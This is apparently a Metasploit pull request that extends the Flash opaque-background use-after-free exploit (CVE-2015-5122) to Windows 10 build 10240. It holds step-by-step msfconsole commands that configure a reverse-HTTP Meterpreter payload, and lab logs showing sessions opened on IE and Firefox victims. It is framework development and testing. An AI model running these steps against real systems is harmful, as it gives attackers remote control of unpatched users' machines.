Add support for Windows 10(10240) x86 to CVE-2015-5122 #11924

Merged
merged 2 commits into from Jun 4, 2019

@suzu991154
Contributor

commented Jun 1, 2019

This PR supports Windows 10(10240) x86 with the following changes:

  • Change the search source of some ROP gadgets.
  • Restrict the search for ROP gadgets to code sections.

This PR requires rapid7/rex-exploitation#20.

Verification

  • Set up Windows 10 Build 10240 (for the Firefox case: Firefox 39 and Flash 18.0.0.203 for Firefox)
  • use exploit/multi/browser/adobe_flash_opaque_background_uaf
  • set PAYLOAD windows/meterpreter/reverse_http
  • set LHOST <host>
  • set LPORT <port>
  • set SRVPORT 80
  • set URIPATH /
  • run
  • Start IE/FF and access
  • It should get a session

Windows 10(10240) x64 + IE11(WOW64) - Win10 has a built-in Flash 18.0.0.203

msf5 > use exploit/multi/browser/adobe_flash_opaque_background_uaf
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set SRVPORT 80
SRVPORT => 80
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set URIPATH /
URIPATH => /
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set LHOST 192.168.56.86
LHOST => 192.168.56.86
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started HTTP reverse handler on http://192.168.56.86:8080
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.56.86:80/
[*] Server started.
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) >
 :
(start IE and access)
 :
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Gathering target information for 192.168.56.208
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Sending HTML response to 192.168.56.208
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Request: /wPsNxL/
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Sending HTML...
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Request: /wPsNxL/oCvF.swf
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Sending SWF...
[*] http://192.168.56.86:8080 handling request from 192.168.56.208; (UUID: 7qu8gqs6) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (192.168.56.86:8080 -> 192.168.56.208:58052) at 2019-05-31 17:04:12 +0900

msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-IK2RT2G
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getpid
Current pid: 2160
meterpreter > ps

Process List
============

 PID   PPID  Name                              Arch  Session  User                  Path
 ---   ----  ----                              ----  -------  ----                  ----
 0     0     [System Process]
 2160  336   iexplore.exe                      x86   1        DESKTOP-IK2RT2G\user  C:\Program Files (x86)\Internet Explorer\iexplore.exe

Windows 10(10240) x64 + Firefox 39.0, Flash 18.0.0.203

(start FF and access)
 :
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Gathering target information for 192.168.56.208
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Sending HTML response to 192.168.56.208
[-] 192.168.56.208     adobe_flash_opaque_background_uaf - Target 192.168.56.208 has requested an unknown path: /favicon.ico
[-] 192.168.56.208     adobe_flash_opaque_background_uaf - Target 192.168.56.208 has requested an unknown path: /favicon.ico
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Request: /wPsNxL/
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Sending HTML...
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Request: /wPsNxL/NvBW.swf
[*] 192.168.56.208     adobe_flash_opaque_background_uaf - Sending SWF...
[*] http://192.168.56.86:8080 handling request from 192.168.56.208; (UUID: 7qu8gqs6) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 2 opened (192.168.56.86:8080 -> 192.168.56.208:58067) at 2019-05-31 17:04:29 +0900

msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) >
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : DESKTOP-IK2RT2G
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Meterpreter     : x86/windows
meterpreter > getpid
Current pid: 2472
meterpreter > ps

Process List
============

 PID   PPID  Name                              Arch  Session  User                  Path
 ---   ----  ----                              ----  -------  ----                  ----
 0     0     [System Process]
 2160  336   iexplore.exe                      x86   1        DESKTOP-IK2RT2G\user  C:\Program Files (x86)\Internet Explorer\iexplore.exe
 2472  3532  FlashPlayerPlugin_18_0_0_203.exe  x86   1        DESKTOP-IK2RT2G\user  C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_18_0_0_203.exe

meterpreter >
@suzu991154

Contributor Author

commented Jun 3, 2019

I corrected the OS check process.

@wchen-r7

Contributor

commented Jun 4, 2019

The exploit works for me on Windows 10:

msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > [*] Using URL: http://172.16.135.1:80/
[*] Server started.
[*] 172.16.135.135   adobe_flash_opaque_background_uaf - Gathering target information for 172.16.135.135
[*] 172.16.135.135   adobe_flash_opaque_background_uaf - Sending HTML response to 172.16.135.135
[*] 172.16.135.135   adobe_flash_opaque_background_uaf - Request: /aWNMjI/
[*] 172.16.135.135   adobe_flash_opaque_background_uaf - Sending HTML...
[*] 172.16.135.135   adobe_flash_opaque_background_uaf - Request: /aWNMjI/unZZ.swf
[*] 172.16.135.135   adobe_flash_opaque_background_uaf - Sending SWF...
[*] http://172.16.135.1:8080 handling request from 172.16.135.135; (UUID: kzbjxvcb) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (172.16.135.1:8080 -> 172.16.135.135:50501) at 2019-06-04 00:18:22 -0500

The PR is pretty much ready to go, except that we still don't have the new gem yet for rex-exploitation. We will sort that out as soon as possible, and then we'll land this. Thank you @suzu991154

@wchen-r7

Contributor

commented Jun 4, 2019

Got the rex-exploitation gem thing resolved. Turns out I didn't know how to read versions. I'm going to land this now!

@wchen-r7 wchen-r7 merged commit cdce03f into rapid7:master Jun 4, 2019

3 checks passed

  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed

wchen-r7 added a commit that referenced this pull request Jun 4, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 4, 2019

@wchen-r7

Contributor

commented Jun 4, 2019

Release Notes

Windows 10 target support has been added for adobe_flash_opaque_background_uaf.

@suzu991154

Contributor Author

commented Jun 4, 2019

Thanks, @wchen-r7!

@suzu991154 suzu991154 deleted the suzu991154:add_support_for_win10_10240 branch Jun 4, 2019
